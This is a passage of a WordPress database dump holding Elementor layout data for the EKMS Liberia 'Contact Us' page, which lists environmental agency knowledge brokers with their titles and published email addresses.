11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer, EPA<br>\\n\\nUNCBD Focal Point<br>\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong><br>\\n\\nMEAs Coordinator, EPA<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator, EPA<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(15966,2414,'_elementor_edit_mode','builder'),(15967,2414,'_elementor_template_type','wp-page'),(15968,2414,'_elementor_version','2.7.5'),(15969,2414,'_wp_page_template','default'),(15970,2414,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"